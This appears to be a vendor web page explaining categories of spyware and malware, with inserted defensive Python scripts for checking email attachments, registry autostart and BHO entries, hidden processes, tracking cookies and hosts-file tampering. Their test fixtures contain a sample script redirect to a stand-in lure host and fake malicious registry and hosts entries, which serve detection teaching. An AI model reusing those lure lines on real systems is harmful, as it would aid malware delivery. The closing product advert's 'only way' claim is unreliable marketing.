The Many Faces of Spyware
If there's one thing you should know about spyware, it's that no two spyware programs are exactly alike. However, many of them do share the same characteristics, making it possible to categorize the various spyware applications. To help you understand the differences between the various types of spyware, we are providing descriptions of the different spyware categories.
Adware
On TV there are commercials. On a computer there is adware: programs that display advertisements, often for things unrelated to the site or application you are using.
Given this definition, it is not hard to see that some adware is benign or even (arguably) useful. It appears as advertising blocks on websites or inside free applications, and the advertising revenue is what lets the site stay free for its host and the service stay free for the user.
Some adware is equally benign in what it does, but its installation skirts an ethical line. It comes bundled with other software without stating its presence up front: the agreement to show ads may not appear in the installer at all, or it appears only buried in the End User License Agreement (the long "I Accept" contract that few people read in full, or at all).
Finally, there is adware that is plainly malware. It is installed unwittingly by the user or comes secretly bundled with another program, and that secrecy is what gets it classified as a type of Trojan. These are the most notorious: they hijack browser windows, steer you to websites you did not ask for, or replace your home page with one of their choosing. The best known form is the classic pop-up, an unrequested ad that opens over other windows. Beyond the annoyance, the unscrupulous way these programs are installed means they rarely arrive alone; they are usually accompanied by other spyware that monitors your web use.
Backdoors
Backdoors are a particularly dangerous form of Trojan. Once a backdoor is installed, it lets another person (called the master) monitor the computer's activity and, typically, run a remote access utility on it: a tool that gives access to the machine's files and commands, and with that the ability to control them. Remote access itself is legitimate; system administrators and tech support staff use it, with your permission, to set up and repair systems, reaching your computer over the LAN or the Internet from across town or across the country, much like using a remote control. A backdoor gives the master the same access without asking your permission and without your knowledge. Consequently a master can
- view confidential information
- execute malicious code
- launch programs
- send and receive data via the Internet
- delete files and other data
- display notifications
- reboot the system
This means a single backdoor can do the work that usually takes several smaller Trojans. And since the master does not want you to know they are there, the backdoor is discreet and steals information silently. Many backdoors also hide themselves from the list of running programs (the process list), which makes them hard to detect.
Browser Helper Objects
As their name implies, Browser Helper Objects (BHOs) are add-ons that help a web browser (specifically Windows Internet Explorer, whose add-on mechanism they are) perform specialised tasks. For example, the plug-in that lets IE open an Adobe PDF is a BHO, as is the Google Toolbar for IE. But as with most legitimate mechanisms, illegitimate uses exist as well.
Since a BHO runs inside the browser and has unrestricted access to the Internet Explorer event model (it is told about every page load, navigation and form submission), malicious programmers have used this to their advantage. Some BHOs, such as the MyWay Search Bar, tracked user activity and sold that information to third parties. More insidious BHOs work in tandem with other Trojans. Download.ject was a well-known attack that downloaded a keylogger onto the user's computer and then used a BHO to detect whenever the user accessed a secure (HTTPS) site, at which point the keylogger captured the passwords being typed. Because the BHO sits inside the browser, it sees form contents before they are encrypted, so HTTPS offers no protection against it.
Commercial RATs
A commercial RAT (Remote Administration Tool) is not in itself a bad thing, but when one is used to administer a computer without the owner's consent or knowledge, the situation turns ugly. If a commercial RAT is installed on your system and controlled by an unscrupulous attacker, he or she can shut down programs, delete files and copy everything on your hard drive. Misused commercial RATs are among the more dangerous spyware risks lurking on the Web.
Data Miners
Data miners are programs that collect data from your computer (email addresses, web searches and so on) and transmit it to a third party. Tracking cookies are often lumped in with data miners because they serve the same end, even though a cookie is only data and not a program (see the section on tracking cookies below); most cookies are harmless.
Dialers
Originally the word dialer referred to any program that let an analog dial-up modem connect to a phone line; such programs were necessary for all pre-broadband Internet use. Today the word usually refers to a specific type of fraud that uses a dialer to connect the user to a premium-rate number (the equivalent of a 1-900 number) at outrageous cost.
Sometimes the dialer advertises access to a multitude of special content: illegal MP3 downloads, pornography or hacking materials. The most insidious dialers look for weaknesses in the settings of the user's OS and change the dial-up number to a premium number without telling the user. The people distributing these dialers often have agreements with the premium-rate operators to take a percentage of the profit.
Downloaders
A downloader does exactly what its name implies: it is the part of a Trojan that actually downloads the malicious software onto the user's computer. From there, the downloader either launches the malware directly or registers it with the operating system (for example in an autostart location) so that it runs at a specified time or after a specified action. Sometimes the locations and names of the files to download are fetched from a remote site controlled by the attacker, and sometimes they are hard-coded into the downloader itself.
Email Worms
Like all worms, an email worm is a self-propagating (self-replicating) program; this one, logically, spreads via email. Email worms are perhaps the most recognisable form of malware, since almost anyone with an email address has seen their share of bogus emails, many of which carry harmful programs.
Not so long ago people became very worried about opening email attachments, and these worms were the reason. Like any malicious software, an email worm is a program and can only function if it is executed, so it took an active gesture from the user, such as opening the attachment, to install it. There were, however, more sophisticated email worms that installed themselves through the HTML rendering of the message body, by exploiting flaws in the component that rendered it. Merely reading the email then put the user at risk, especially if the email client (programs like Microsoft Outlook) had a preview pane that rendered a message as soon as it was highlighted in the inbox.
Fortunately, most modern email clients can render messages as plain text, in which case the body cannot carry executable content. Worm makers are wily, though, and email worms have made a resurgence thanks to social engineering, a method that relies more on trickery than on coding muscle to get the user to run the worm. Phishing-style scams are particularly effective at getting unsuspecting users to divulge sensitive information and to open the attachment or link that installs the worm.
For the most part, email today is much safer than it used to be, but basic caution is still needed. Do not open attachments from people or organisations you do not know, and be wary of official-looking emails that ask for sensitive information (such as account numbers or credit card numbers). No reputable organisation asks for these by email, only on its own secure site. And when in doubt, pick up the phone and ask, using a number you already have rather than one printed in the email.
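The two risks described above, an attachment that is really an executable and an HTML body that carries active content, can be checked mechanically before anything is opened. The Python script below is an added example, not code from this page; it parses a constructed message (sender, subject, link and attachment name are all made up, and the base64 payload is a harmless placeholder) with the standard email library, flags the double-extension attachment and the script tag, and shows what a plain-text rendering of the same message would display. The list of executable extensions is the example's own choice and is not complete.

```python
import email
import re
from email import policy

# Constructed sample message for this example: the sender, subject, link and
# attachment are made up, and the base64 payload is a harmless placeholder.
SAMPLE_EML = """\
From: "Account Services" <alerts@bank-example.invalid>
To: alice@example.invalid
Subject: Your statement is ready
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/html; charset="utf-8"

<html><body><p>Your statement is attached.</p>
<script>document.location="http://lure.invalid/update.exe"</script>
</body></html>
--XYZ
Content-Type: application/octet-stream; name="statement.pdf.exe"
Content-Disposition: attachment; filename="statement.pdf.exe"
Content-Transfer-Encoding: base64

Tm90IHJlYWxseSBhIHByb2dyYW0=
--XYZ--
"""

# Extensions Windows will execute when the attachment is opened (not exhaustive).
EXEC_EXT = {'.exe', '.scr', '.pif', '.com', '.bat', '.cmd', '.vbs', '.vbe',
            '.js', '.jse', '.wsf', '.wsh', '.hta', '.cpl', '.lnk'}
ACTIVE_TAG = re.compile(r'<\s*(script|iframe|object|embed)\b', re.I)


def risky_attachment(filename):
    """Reason string if the filename looks like an executable lure, else None."""
    parts = filename.lower().split('.')
    if len(parts) < 2:
        return None
    ext = '.' + parts[-1]
    if ext not in EXEC_EXT:
        return None
    if len(parts) > 2:
        return f'double extension hiding an executable: {filename}'
    return f'executable attachment: {filename}'


def analyse(raw_message):
    """Walk every MIME part and collect the warnings a cautious client would raise."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if filename:
            reason = risky_attachment(filename)
            if reason:
                findings.append(reason)
        elif part.get_content_type() == 'text/html':
            m = ACTIVE_TAG.search(part.get_content())
            if m:
                findings.append(f'active content in HTML body: <{m.group(1).lower()}>')
    return findings


def plain_text_view(raw_message):
    """What a plain-text rendering shows: markup stripped, nothing executed."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=('plain', 'html'))
    if body is None:
        return ''
    text = body.get_content()
    if body.get_content_type() == 'text/html':
        text = re.sub(r'<script.*?</script>', '', text, flags=re.S | re.I)
        text = re.sub(r'<[^>]+>', '', text)
    return ' '.join(text.split())


if __name__ == '__main__':
    for finding in analyse(SAMPLE_EML):
        print('WARNING:', finding)
    print('plain-text view:', plain_text_view(SAMPLE_EML))
```

Note that the plain-text view keeps the sentence the user needs and drops the script entirely; that is the whole point of plain-text rendering. A real mail gateway would also look inside archives and at file magic rather than trusting the extension.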
Firewall Killers
A firewall killer is a malware program designed to disable a PC's firewall. Besides the firewall, these programs are also known to disable anti-virus and anti-spyware software, and some can delete the anti-virus and anti-spyware definition files. Sometimes the user can tell that a firewall killer has hit the system because the security software visibly shows as disabled; but some firewall killers have advanced to the point where they disarm the computer's defences while leaving the firewall and other security programs looking fully operational. Because of this, the security software's own status display cannot be trusted once a compromise is suspected; the only reliable way to rule a firewall killer out is a scan with trusted anti-malware tooling that does not depend on the possibly compromised system, such as one run from clean boot media.
Flooders
A flooder can be an Internet nightmare. These programs send damaging volumes of traffic at a network or host in the hope of overloading it and knocking the Internet connection, or the targeted service, offline; when many infected machines flood the same target at once the result is a distributed denial-of-service (DDoS) attack.
Hijackers
Browser hijackers are another type of spyware to be concerned about. They change your browser settings, such as your home page and your default search page, to point at sites of the hijacker's choosing. If your home page has ever changed without you changing it, you have been the victim of a browser hijacking.
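The three kinds of change described above (a downloader registering its payload to autostart, a BHO registering itself with the browser, and a hijacker rewriting the start page) all leave traces in the Windows registry, and they can be reviewed offline from a `reg export` file. The Python script below is an added example, not code from this page or from any vendor. It relies on three registry locations that are not mentioned on this page: the `...\CurrentVersion\Run` autostart key, the `Explorer\Browser Helper Objects\{CLSID}` key where BHOs are registered (each CLSID's `InProcServer32` value holds the DLL path), and `Internet Explorer\Main\Start Page`. The .reg text it parses is constructed; every path, value name and CLSID in it is made up.

```python
import re

# Constructed sample of a `reg export` (.reg) file.  Every path, value name
# and CLSID below is made up for this example and identifies no real software.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"VendorAgent"="\"C:\\Program Files\\ExampleVendor\\Agent.exe\" /tray"
"Updater"="C:\\Users\\alice\\AppData\\Local\\Temp\\svch0st.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://search-example.invalid/?aff=1234"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]
@=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]
@=""

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32]
@="C:\\Program Files\\ExampleVendor\\PdfHelper.dll"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InProcServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\qwe\\toolbar.dll"
'''

RUN_KEY = re.compile(r'\\CurrentVersion\\Run$', re.I)
BHO_KEY = re.compile(r'\\Browser Helper Objects\\(\{[0-9A-F-]+\})$', re.I)
SERVER_KEY = re.compile(r'^HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-F-]+\})\\InProcServer32$', re.I)
IE_MAIN_KEY = re.compile(r'\\Internet Explorer\\Main$', re.I)
# Directories an unprivileged user can write to.  Legitimate per-user installers
# use them too, so a hit is a lead for the analyst, not a verdict.
USER_WRITABLE = ('\\appdata\\', '\\temp\\', '\\users\\public\\', '\\programdata\\')


def parse_reg(text):
    """Return {key_path: {value_name: string_data}} for the string values in a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and '=' in line:
            name, _, data = line.partition('=')
            name = name if name == '@' else name.strip('"')
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                # .reg files escape backslashes and quotes inside string data
                keys[current][name] = re.sub(r'\\(["\\])', r'\1', data[1:-1])
    return keys


def exe_path(command):
    """Executable part of a Run-key command line, quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(' ', 1)[0]


def in_user_writable_dir(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def triage(reg_text):
    """Return (kind, name, detail) findings worth an analyst's attention."""
    keys = parse_reg(reg_text)
    servers = {}                                   # CLSID -> DLL path
    for key, values in keys.items():
        m = SERVER_KEY.match(key)
        if m:
            servers[m.group(1).upper()] = values.get('@', '')
    findings = []
    for key, values in keys.items():
        if RUN_KEY.search(key):
            for name, command in values.items():
                path = exe_path(command)
                if in_user_writable_dir(path):
                    findings.append(('run', name, path))
        elif (m := BHO_KEY.search(key)):
            clsid = m.group(1).upper()
            dll = servers.get(clsid, '')
            if not dll or in_user_writable_dir(dll):
                findings.append(('bho', clsid, dll or '<no InProcServer32>'))
        elif IE_MAIN_KEY.search(key):
            # Always surface the start page: only the user knows what it should be.
            if 'Start Page' in values:
                findings.append(('startpage', 'Start Page', values['Start Page']))
    return findings


if __name__ == '__main__':
    for kind, name, detail in triage(SAMPLE_REG):
        print(f'{kind:9} {name:42} {detail}')
```

On the constructed input the vendor agent in Program Files and the BHO whose DLL lives there are left alone, while the autostart entry in the user's Temp directory, the BHO whose DLL sits in AppData, and the start page are reported. The user-writable-directory heuristic is deliberately loose: plenty of legitimate per-user software installs under AppData, so each hit still needs a human look.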
Keyloggers
A keylogger is a program, installed on a user's computer, that records the keystrokes the user types. Those keystrokes can then be read by a third party and can reveal passwords, credit card numbers or other sensitive data such as Social Security numbers.
Most keyloggers are bundled with other malware and are among the programs installed by Trojan-Downloaders or Trojan-Droppers. Since a keylogger is something its author certainly does not want you to know about, it is classified as a Trojan as well.
Malware
Malware is the most inclusive label for malicious software. From the Latin malus, mala, meaning bad, evil or wrong, the name refers to any program designed to damage other software or to perform actions without the user's consent.
Hence viruses, worms, Trojans, backdoors, rootkits, logic bombs and the like all fall under this category. Programs that are not malicious in themselves but exist to aid in the creation of malicious software are usually counted as malware too, since they indirectly accomplish the same thing.
P2P
"P2P" stands for "peer to peer", and P2P networks are what many computer users use to share files and programs. Unfortunately, while P2P networks let people share programs and files with each other, a great many of the downloads found on these networks come bundled with spyware and malware. From viruses to keyloggers, P2P users have fallen victim to many spyware attacks after a seemingly innocent download.
Potentially Unwanted Applications
Potentially Unwanted Applications (PUAs) are programs that carry no known direct risk to your computer but that you probably did not ask for: they are typically bundled with popular applications and sometimes preinstalled on new computers.
Rogue Anti-Spyware
Rogue anti-spyware is exactly what it sounds like: "anti-spyware" programs gone bad. Some rogue anti-spyware products are simply programs that do not work as they should, while others are more sinister and actually act as spyware on the systems they claim to protect. Because it is hard to tell rogue anti-spyware from the real thing, it is critical to download and use only trusted anti-spyware products.
Rootkits
A rootkit is a set of programs that hackers use to hide the fact that they are manipulating files on the system. The term comes from attacks on Unix servers: after getting into a low-privileged account (through a cracked password or some other vulnerability), the attacker would escalate privileges until they held root (administrative) rights, and then install the "kit" to keep that access and hide their presence.
The kit itself is a collection of smaller programs designed to put up a smokescreen while the attacker works. By loading a kernel module, or by replacing system binaries (such as ps, ls and netstat) or system libraries, it makes the system report that nothing is wrong.
Nowadays the same smokescreen is used on Windows systems as well. Infection is made easier because most home users run with administrative accounts. And even though administrative access is not called root access on Windows, the method is the same, so the name has carried over.
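One practical way to catch the smokescreen described above is a cross-view check: compare the process list that the /proc tree reports (which is what ps and top read) with the list obtained by asking the kernel about every possible PID directly. A rootkit that filters the /proc listing must separately hook kill(2) to stay hidden from the second view. The Python script below is an added example, not code from this page, and is Linux only. Thread IDs are included in the /proc view because kill(tid, 0) succeeds for a thread as well, which would otherwise produce false positives for every multithreaded process.

```python
import os


def pids_from_proc():
    """PIDs and thread IDs as the /proc tree reports them (ps and top read the same tree).

    Thread IDs are included because kill(tid, 0) succeeds for a thread as well,
    and threads are not listed at the top level of /proc.
    """
    ids = set()
    for entry in os.listdir('/proc'):
        if not entry.isdigit():
            continue
        ids.add(int(entry))
        try:
            ids.update(int(tid) for tid in os.listdir(f'/proc/{entry}/task'))
        except OSError:
            pass                    # the process exited while we were looking
    return ids


def pids_by_probing(limit=None):
    """IDs that answer to kill(pid, 0), asked one at a time up to `limit`.

    ProcessLookupError means no such process; PermissionError means it exists
    but belongs to someone else, which is still proof of existence.
    """
    if limit is None:
        try:
            with open('/proc/sys/kernel/pid_max') as f:
                limit = int(f.read())
        except OSError:
            limit = 32768
    found = set()
    for pid in range(1, limit + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        found.add(pid)
    return found


def hidden_pids(listed, probed):
    """IDs the kernel admits exist but the listing omits: rootkit candidates."""
    return probed - listed


def self_visible():
    """Sanity check: our own process must appear in the /proc view."""
    return os.getpid() in pids_from_proc()


def scan(passes=2):
    """Run the cross-view check several times and keep only IDs hidden every time.

    A process that started or exited between the two snapshots shows up as a
    one-off difference; intersecting the passes removes that noise.
    """
    hidden = None
    for _ in range(passes):
        probed = pids_by_probing()
        current = hidden_pids(pids_from_proc(), probed)
        hidden = current if hidden is None else hidden & current
    return hidden


if __name__ == '__main__':
    suspects = scan()
    print('hidden PIDs:', sorted(suspects) if suspects else 'none')
```

Probing every PID up to pid_max takes a few seconds in Python. On a clean system the result is empty; a non-empty result after two passes deserves a look with tooling run from trusted boot media, because a rootkit that hooks both interfaces can defeat this check entirely.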
Spyware
Spyware is a term that covers a broad range of undesirable programs that may infect your computer. If a program invades your privacy by letting someone else eavesdrop on your computer activity, it falls into the spyware category. Examples of spyware include keyloggers and tracking cookies. Almost every computer connected to the Web has been, or will be, attacked by spyware of some form. The only way to protect yourself and your privacy is to run a comprehensive anti-spyware program on your system at all times.
Tracking Cookies
It is a frequent misconception that a cookie is a program. It is not, and so it cannot execute any action, malicious or otherwise. A cookie is a small piece of data (often stored as a simple text file) that a server sends to the user's browser and that the browser sends back with every later request to that server. This lets a server store a cookie on your computer so that when you return to its website it recognises you and shows you your personalised page. Deleting the cookie does not hurt your computer; it only means that the website no longer recognises you.
So what's the big deal? A cookie can aid in tracking web activity. So-called tracking cookies are set not by the site you are visiting but by a third party, typically an advertising network, whose content is embedded on many different sites; because the browser sends the same cookie back every time that third party's content loads, the third party can see which of those sites you visit and how often. Advertisers use this to target ads at you personally, and by monitoring the sites you visit they can learn things such as where you bank and shop.
Removing cookies never hurts, since they can simply be sent again, and the majority of cookies are harmless. Disabling cookies entirely, however, breaks many legitimate websites: shopping carts, for example, rely on cookies to keep track of what is in your cart and what you have updated. Most browsers let you block third-party cookies only, which stops this kind of cross-site tracking while leaving the site you are actually visiting working.
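The cross-site mechanism described above can be made concrete with a small simulation. The Python code below is an added example, not code from this page: a constructed ad host, ads.tracker.invalid, is embedded on three made-up first-party sites. It issues a uid cookie scoped to its own domain, and because the browser returns that cookie on every later request to the ad host, a single identifier links the visits to all three sites. Run with block_third_party=True, the simulated browser refuses to store or send cookies for any host other than the page it is on, and the ad host sees three unrelated visitors instead. The cookie formatting and parsing use the standard http.cookies module.

```python
import itertools
from http.cookies import SimpleCookie


class AdServer:
    """Constructed stand-in for a third-party advertising host embedded on many sites."""

    def __init__(self, host):
        self.host = host
        self._next_id = itertools.count(1000)
        self.profiles = {}          # uid -> first-party sites it was seen on

    def serve(self, cookie_header, referer_site):
        """Handle one request for the embedded ad; return a Set-Cookie value or None."""
        jar = SimpleCookie()
        if cookie_header:
            jar.load(cookie_header)
        set_cookie = None
        if 'uid' in jar:
            uid = jar['uid'].value                  # returning visitor: reuse the ID
        else:
            uid = str(next(self._next_id))          # new visitor: mint an ID and set it
            fresh = SimpleCookie()
            fresh['uid'] = uid
            fresh['uid']['domain'] = self.host      # scoped to the ad host, not the page
            fresh['uid']['path'] = '/'
            set_cookie = fresh.output(header='').strip()
        self.profiles.setdefault(uid, []).append(referer_site)
        return set_cookie


class Browser:
    def __init__(self, block_third_party=False):
        self.jar = {}               # host -> SimpleCookie
        self.block_third_party = block_third_party

    def visit(self, site, ad_server):
        """Load a first-party page that embeds a resource from the ad server."""
        third_party = ad_server.host != site
        suppressed = third_party and self.block_third_party
        cookie_header = None
        if not suppressed and ad_server.host in self.jar:
            # The Cookie request header carries name=value pairs only
            cookie_header = '; '.join(f'{name}={morsel.value}'
                                      for name, morsel in self.jar[ad_server.host].items())
        set_cookie = ad_server.serve(cookie_header, site)
        if set_cookie and not suppressed:
            self.jar.setdefault(ad_server.host, SimpleCookie()).load(set_cookie)


def simulate(block_third_party):
    """Visit three made-up sites that all embed the same ad host; return what it learned."""
    ads = AdServer('ads.tracker.invalid')
    browser = Browser(block_third_party)
    for site in ('news.invalid', 'bank.invalid', 'shop.invalid'):
        browser.visit(site, ads)
    return ads.profiles


if __name__ == '__main__':
    print('third-party cookies allowed:', simulate(False))
    print('third-party cookies blocked:', simulate(True))
```

With cookies allowed the ad host ends up with one profile, {'1000': ['news.invalid', 'bank.invalid', 'shop.invalid']}, which is exactly the "where you bank and shop" knowledge the section warns about; with them blocked it holds three single-visit profiles it cannot connect.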
Trojan Horses
These are most commonly referred to simply as Trojans, a type of malware defined by the secrecy of its installation. Believe it or not, many early viruses announced their presence, damaging files or interrupting the system with boldness. Today most malware programmers want to be neither seen nor heard: the ideal is to spy on you, monitor your web activity, snoop on your sensitive information, steal account numbers and hijack system operations without your ever knowing it.
Like the Greek strategy for conquering Troy (building a giant horse, filling it with soldiers, and presenting it as a gift), a malicious Trojan gets in by deception. There are many variations, but all intend to carry out malicious activity on your computer without your being any the wiser. Most often Trojan writers accomplish this by bundling their software with legitimate programs that the user installs without ever realising there are armed enemies inside.
Trojan-Clickers
This is a family of Trojans that redirects an infected computer to some location on the Internet, usually a specified website. It does this in one of two ways: by sending commands directly to the web browser (Internet Explorer, Netscape and the like) telling it where to go, or by altering the system files where name-to-address mappings are stored, such as the hosts file, so that a familiar name resolves to the attacker's server.
The reasons Trojan-Clickers are used range from the merely dishonest (inflating a website's hit count for advertising purposes) to the malicious (organising a DoS attack on a particular website or server) to the subversive (leading the victim machine to a website that infects it with more malware).
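A hosts file altered by a Trojan-Clicker is easy to audit, because every line in it is a name pinned to an address that bypasses DNS. The Python script below is an added example (not code from this page) that parses a constructed hosts file and flags two patterns: a protected name, such as a bank, pointed anywhere other than the local machine (a redirect), and a security vendor's update server pointed at loopback (a way malware blocks definition updates, the same outcome the firewall-killer section above describes). The domain lists passed to audit_hosts are the caller's; the ones used here, like the addresses, are made up.

```python
import ipaddress

# Constructed hosts file for this example; none of the domains are real services.
SAMPLE_HOSTS = """\
# added by installer
127.0.0.1       localhost
::1             localhost
192.0.2.10      mybank.example login.mybank.example
127.0.0.1       updates.antivirus-vendor.example
10.0.0.5        intranet.corp.example
"""


def parse_hosts(text):
    """Return (line_number, ip_address, hostname) for every mapping in a hosts file."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split('#', 1)[0].strip()       # drop comments and blanks
        if not line:
            continue
        ip, *names = line.split()
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue                              # malformed address; not our concern here
        for name in names:
            entries.append((lineno, addr, name.lower()))
    return entries


def matches_suffix(name, suffixes):
    """True if name equals one of the suffixes or is a subdomain of one."""
    return any(name == s or name.endswith('.' + s) for s in suffixes)


def audit_hosts(text, protected_domains, security_vendor_domains):
    """Flag hosts entries that redirect protected names or sinkhole security vendors.

    protected_domains: names (banks, shops) that should never be overridden locally.
    security_vendor_domains: update servers that malware likes to point at loopback.
    Returns (line_number, kind, hostname, address) tuples.
    """
    findings = []
    for lineno, addr, name in parse_hosts(text):
        if name == 'localhost':
            continue
        local = addr.is_loopback or addr.is_unspecified
        if matches_suffix(name, protected_domains) and not local:
            findings.append((lineno, 'redirect', name, str(addr)))
        elif not addr.is_private:
            # Any name pinned to a public address sidesteps DNS entirely
            findings.append((lineno, 'redirect', name, str(addr)))
        elif local and matches_suffix(name, security_vendor_domains):
            findings.append((lineno, 'update-block', name, str(addr)))
    return findings


if __name__ == '__main__':
    for lineno, kind, name, addr in audit_hosts(SAMPLE_HOSTS,
                                                ('mybank.example',),
                                                ('antivirus-vendor.example',)):
        print(f'line {lineno}: {kind:12} {name} -> {addr}')
```

The private-address entry for the intranet host is left alone, since pinning internal names in the hosts file is a normal administrative practice; the two bank names and the vendor update server are reported. Note that Python's ipaddress module treats the documentation range 192.0.2.0/24 as private, which is why the bank entry is caught by the protected-domain rule rather than the public-address rule.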
Trojan-Droppers
This is a family of Trojans designed to install malicious software on a user's computer without being detected. The name comes from the program's ability to drop one or many payloads (usually other Trojans) into various files on the system while the user is unaware. Sometimes the dropper does this silently, and sometimes it displays a fake error message about a corrupt archive or an operating system fault. The purpose is to distract the user and make them think that, if the computer is acting strangely, it is a glitch in the software or the OS.
The dropper itself contains all the code needed to install and execute the smaller programs that it drops.
Droppers are also notorious for including at least one decoy payload: a benign and often fully functional media application, such as a joke generator, music file, video file, image or even a game. This too distracts the user and makes them think the file they downloaded is legitimate, when really it is a cover for malware that may be redirecting browsers, launching pop-ups or gathering sensitive data. The decoy also helps the dropper get past some spyware detectors, which may overlook the hidden files on the assumption that the package is harmless.
Trojan-Proxies
This family of Trojans installs a proxy server on the victim computer that lets others reach the Internet anonymously through it. Spammers often use Trojan proxies to send their junk email: they will not spend their own bandwidth (or burn their own addresses, which would quickly be blacklisted) when they can use yours, and potentially that of your email contacts. The proxy turns your computer into a relay for Internet traffic, usually email. It is common practice today for coders to infect many machines with Trojan proxies and then sell access to the resulting proxy network to unscrupulous spamming operations.
Not only is this an invasion of privacy and a nuisance to your email contacts, it can also implicate your computer in malicious, or even illegal, activity.
Viruses
Perhaps the best known and most popularised form of malware, a virus is code that carries out some malicious purpose on the victim machine. Usually its objective is to infiltrate vital resources, exposing data to theft or attack, or to execute a particular action once the user performs a specific sequence of actions. A virus differs from a worm in that it does not spread across a LAN or the Internet on its own. Instead it infects a host program, file or disk, and it can only activate when a user (wittingly or unwittingly) accesses the infected material and so launches the malicious code. Hence viruses usually spread by
- being launched from an infected file on a network share accessed by other users
- being launched from an infected email attachment
- being launched from infected storage media (such as a floppy disk, CD or flash drive)
Worms
Worms are malicious programs that propagate themselves over the Internet and LANs. Unlike a virus, a worm does not need to infect a host program; legitimate programs that carry a worm are not necessarily altered by it and keep working independently. Worms therefore spread easily through email attachments, instant message attachments, FTP file shares and P2P file shares, which is why P2P services such as Kazaa or LimeWire are so potentially dangerous. Many worms need no file at all: they exploit a vulnerability in a network service to copy themselves directly onto the next machine. All of these channels can carry a worm.
As their name suggests, these parasites are best characterised by their tendency to reproduce rapidly, frequently and in multiple locations, which makes them harder for removal programs to find and remove. Once spread to as many computers as possible, they carry out a variety of tasks: exposing sensitive data to theft, launching pop-ups and other advertising (adware), hijacking browsers and spying on user activity (spyware).
The only way to ensure that you are protected from these various spyware threats is through the use of a comprehensive anti-spyware product like AntiSpyware® 2010. Install AntiSpyware® 2010 right now to see exactly which spyware threats you are already infected with and to reduce your risk of future infestations.

Supplementary Resources
Anti Virus Rants
Kaspersky's Viruslist.com - General Malware Types
Kaspersky's Viruslist.com - Specific Malware Types